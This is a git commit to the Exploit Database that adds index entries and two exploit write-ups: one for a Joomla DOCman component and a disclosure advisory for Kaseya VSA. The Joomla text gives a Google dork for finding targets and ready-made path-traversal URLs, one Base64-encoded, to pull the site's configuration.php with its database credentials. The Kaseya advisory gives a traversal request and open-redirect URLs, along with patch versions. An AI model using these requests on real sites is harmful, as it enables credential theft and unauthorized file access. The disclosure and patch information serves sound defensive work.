DB: 2015-07-16

2 new exploits
This commit is contained in:
Offensive Security 2015-07-16 05:01:51 +00:00
parent 111bcdca4a
commit 9657eacb4d
3 changed files with 95 additions and 0 deletions

View file

@ -33878,6 +33878,7 @@ id,file,description,date,author,platform,type,port
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities",2015-07-15,"Pedro Ribeiro",windows,webapps,0
37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
@ -33954,3 +33955,4 @@ id,file,description,date,author,platform,type,port
37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0
37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80

Can't render this file because it is too large.

30
platforms/php/webapps/37620.txt Executable file
View file

@ -0,0 +1,30 @@
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"
# Xploit (FPD):
Get one target and just download with blank parameter:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=
In title will occur Full Path Disclosure of server.
# Xploit (LFD/LFI):
http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
Let's Xploit...
First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
../../../../../../../target/www/configuration.php <= Not Ready
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
And Now we have a configuration file...

View file

@ -0,0 +1,63 @@
tl;dr
Two vulns in Kaseya Virtual System Administrator - an authenticated
arbitrary file download and two lame open redirects.
Full advisory text below and at [1]. Thanks to CERT for helping me to
disclose these vulnerabilities [2].
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 13/07/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can
be leveraged seamlessly across IT disciplines to streamline and
automate your IT services. Kaseya VSA integrates key management
capabilities into a single platform. Kaseya VSA makes your IT staff
more productive, your services more reliable, your systems more
secure, and your value easier to show."
>> Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
Affected versions: unknown, at least v9
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referrer header must be included. A
sample request can be obtained by downloading any file attached to any
ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in
the default C:\Kaseya directory. The file download root is the
WebPages directory (<Kaseya_Install_Dir>\WebPages\).
#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX
a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)
>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
[1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt
[2] https://www.kb.cert.org/vuls/id/919604